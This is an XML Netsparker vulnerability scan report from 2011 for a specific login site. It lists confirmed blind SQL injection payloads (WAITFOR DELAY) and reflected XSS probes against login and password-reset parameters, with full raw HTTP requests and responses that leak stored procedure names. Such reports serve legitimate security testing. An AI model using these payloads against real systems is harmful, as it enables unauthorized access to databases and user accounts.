﻿<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet href="vulnerabilities-list.xsl" type="text/xsl" ?>
<netsparker generated="4/20/2011 6:10:47 PM">
	<target>
		<url>http://login.vindicosuite.com/</url>
        <scantime>867</scantime>
	</target>
	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=NPKJIJIDCLHCDOGAIKODKEFK
Content-Length: 60
Accept-Encoding: gzip, deflate

password=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;username=Smith
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:28 GMT


&lt;head&gt;&lt;title&gt;Object moved&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;h1&gt;Object Moved&lt;/h1&gt;This object may be found &lt;a HREF=&quot;/default.asp?message=Invalid%20Username%20and%20or%20Password&quot;&gt;here&lt;/a&gt;.&lt;/body&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 103
Accept-Encoding: gzip, deflate

username=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;password=3&amp;loginBtn=Login&amp;resetPasswordBtn=Reset+Password
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:44:17 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Procedure or function &apos;VINDICO_Authenticate&apos; expects parameter &apos;@password&apos;, which was not supplied.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 71
Accept-Encoding: gzip, deflate

username=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;password=3&amp;loginBtn=Login
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:15 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Procedure or function &apos;VINDICO_Authenticate&apos; expects parameter &apos;@password&apos;, which was not supplied.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>existingPassword</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=GALJIJIDPBONJNOAKHPNFCBP
Content-Length: 82
Accept-Encoding: gzip, deflate

username=Smith&amp;existingPassword=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;newPassword=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 211
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:48:02 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Procedure or function &apos;VINDICO_PASSWORD_SET&apos; expects parameter &apos;@newPass&apos;, which was not supplied.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=GALJIJIDPBONJNOAKHPNFCBP
Content-Length: 56
Accept-Encoding: gzip, deflate

password=3&amp;username=%27;WAITFOR%20DELAY%20%270:0:25%27--
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:48:28 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Procedure or function &apos;VINDICO_Authenticate&apos; expects parameter &apos;@password&apos;, which was not supplied.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=GALJIJIDPBONJNOAKHPNFCBP
Content-Length: 107
Accept-Encoding: gzip, deflate

username=Smith&amp;password=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;loginBtn=Login&amp;resetPasswordBtn=Reset+Password
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:50:53 GMT


&lt;head&gt;&lt;title&gt;Object moved&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;h1&gt;Object Moved&lt;/h1&gt;This object may be found &lt;a HREF=&quot;/default.asp?message=Invalid%20Username%20and%20or%20Password&quot;&gt;here&lt;/a&gt;.&lt;/body&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=GALJIJIDPBONJNOAKHPNFCBP
Content-Length: 75
Accept-Encoding: gzip, deflate

username=Smith&amp;password=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;loginBtn=Login
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:52:25 GMT


&lt;head&gt;&lt;title&gt;Object moved&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;h1&gt;Object Moved&lt;/h1&gt;This object may be found &lt;a HREF=&quot;/default.asp?message=Invalid%20Username%20and%20or%20Password&quot;&gt;here&lt;/a&gt;.&lt;/body&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp</url>
		<type>ConfirmedBlindSQLInjection</type>
		<severity>Critical</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>newPassword</vulnerableparameter>
		<vulnerableparametervalue>%27;WAITFOR%20DELAY%20%270:0:25%27--</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=GALJIJIDPBONJNOAKHPNFCBP
Content-Length: 82
Accept-Encoding: gzip, deflate

username=Smith&amp;existingPassword=3&amp;newPassword=%27;WAITFOR%20DELAY%20%270:0:25%27--
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 172
Content-Type: text/html
Location: index.asp?message=Invalid%20Username%20/%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:54:05 GMT


&lt;head&gt;&lt;title&gt;Object moved&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;h1&gt;Object Moved&lt;/h1&gt;This object may be found &lt;a HREF=&quot;index.asp?message=Invalid%20Username%20/%20Password&quot;&gt;here&lt;/a&gt;.&lt;/body&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A1</OWASP>
            <WASC>19</WASC>
            <CWE>89</CWE>
            <CAPEC>66</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>password</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000045)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=NPKJIJIDCLHCDOGAIKODKEFK
Content-Length: 109
Accept-Encoding: gzip, deflate

password=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000045)%3c%2fscript%3e&amp;username=Smith
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:28 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000045)&lt;/script&gt;&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00008D)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>message</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00008D)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /AccountManager/ResetPassword/index.asp?message=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00008D)%3C/script%3E HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_ResetAndEmail.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=NPKJIJIDCLHCDOGAIKODKEFK
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3692
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:28 GMT




&lt;!DOCTYPE html&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;!-- 
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
 --&gt;
&lt;head&gt;
	&lt;title&gt;Password Reset&lt;/title&gt;
	
	&lt;script type=&quot;text/javascript&quot;&gt;
	    
        function Handle_EmailPass () {
            var MainForm = document.getElementById(&quot;frm&quot;);
            var username = document.getElementById(&quot;username&quot;).value;
            
            if (username == &quot;&quot;) {
                alert(&quot;A username/email address is required to reset the password.&quot;);
                return;
            } else {
                MainForm.action = &quot;Exec_ResetAndEmail.asp&quot;;
                MainForm.submit();
            }
        }
        
        function Handle_ResetPass () {
            var MainForm = document.getElementById(&quot;frm&quot;);
            MainForm.action = &quot;Exec_Reset.asp&quot;;
            MainForm.submit();	
        }
	&lt;/script&gt;
	
&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;../../App_Themes/Default/vindico2.css&quot;&gt;
	
	&lt;style type=&quot;text/css&quot;&gt;	
        body {
            margin: 10px;
        }
        
        .divMessage {
            margin-bottom: 8px;
            font-weight: bold;
            background-color: #d4e5ae;
            border: 1px solid green;	
            color: black;
            padding: 6px;
        }
	&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;

    &lt;div style=&quot;float: right;&quot;&gt;&lt;a style=&quot;color:blue;&quot; href=&quot;#close&quot; onclick=&quot;window.close();&quot;&gt;close window&lt;/a&gt;&lt;/div&gt;
    &lt;h3&gt;VINDICO Password Reset&lt;/h3&gt;
    
    &lt;div class=&apos;divMessage&apos;&gt;&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00008D)&lt;/script&gt;&lt;/div&gt;

    &lt;form name = &quot;frm&quot; id=&quot;frm&quot; action = &quot;&quot; method = &quot;Post&quot; autocomplete=&quot;off&quot;&gt;
        &lt;table cellpadding=&quot;5&quot; cellspacing=&quot;0&quot; border = &quot;0&quot; style=&quot;width: 100%;&quot;&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;username (email):&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input id=&quot;username&quot; type =&quot;text&quot; value= &quot;&quot; name=&quot;username&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;current password:&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input type =&quot;password&quot; name=&quot;existingPassword&quot; value= &quot;&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td nowrap&gt;&lt;strong&gt;new password:&lt;/strong&gt;&lt;/td&gt;
                &lt;td width=&quot;100%&quot;&gt;
                    &lt;input type =&quot;password&quot; name=&quot;newPassword&quot; value=&quot;&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td&gt;&lt;/td&gt;
                &lt;td&gt;
                    &lt;input type=&quot;button&quot; value=&quot;reset password&quot; onclick = &quot;Handle_ResetPass();&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=2&gt;
                    &lt;hr noshade size=&quot;1&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=&quot;2&quot;&gt;
                    If you &lt;strong&gt;can&apos;t remember your password, enter your username&lt;/strong&gt; 
                    (should be your email address) 
                    in the username field above. Then, &lt;strong&gt;click &apos;Reset and Email&apos;&lt;/strong&gt; 
                    and an email will be sent containing your new password.
                    &lt;br&gt;&lt;br&gt;
                    &lt;input type=&quot;button&quot; value=&quot;reset and email&quot; onclick = &quot;Handle_EmailPass();&quot;&gt;
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td colspan=2&gt;
                    
                &lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
                &lt;td&gt;
                    
                &lt;/td&gt;
            &lt;/tr&gt;		
        &lt;/table&gt;
        &lt;hr noshade size=&quot;1&quot;&gt;
	&lt;/form&gt;
&lt;/body&gt;

&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/vindico_dynamic.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000B5)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 105
Accept-Encoding: gzip, deflate

password=3&amp;username=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000B5)%3c%2fscript%3e
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:31 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000B5)&lt;/script&gt;&apos;, @password = &apos;3&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>username</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000DD)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 127
Accept-Encoding: gzip, deflate

username=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000DD)%3c%2fscript%3e&amp;existingPassword=3&amp;newPassword=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 262
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:47 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000DD)&lt;/script&gt;&apos;, @existingPass = &apos;3&apos;, @newPass = &apos;3&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>existingPassword</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000DE)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 131
Accept-Encoding: gzip, deflate

username=Smith&amp;existingPassword=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000DE)%3c%2fscript%3e&amp;newPassword=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:50 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000DE)&lt;/script&gt;&apos;, @newPass = &apos;3&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>newPassword</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000DF)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CALJIJIDLBDHLJOLIOPDPGOP
Content-Length: 131
Accept-Encoding: gzip, deflate

username=Smith&amp;existingPassword=3&amp;newPassword=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000DF)%3c%2fscript%3e
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:51 GMT


&lt;div class = &apos;ErrorDIV&apos;&gt;Error occured while retreiving data from the database&lt;/div&gt;&lt;div class = &apos;ErrorDIV&apos;&gt;Unclosed quotation mark after the character string &apos;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000DF)&lt;/script&gt;&apos;&apos;.&lt;/div&gt; ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

